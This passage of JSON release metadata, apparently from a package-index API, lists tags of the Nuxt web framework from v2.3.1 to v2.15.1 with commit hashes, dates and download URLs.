b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url"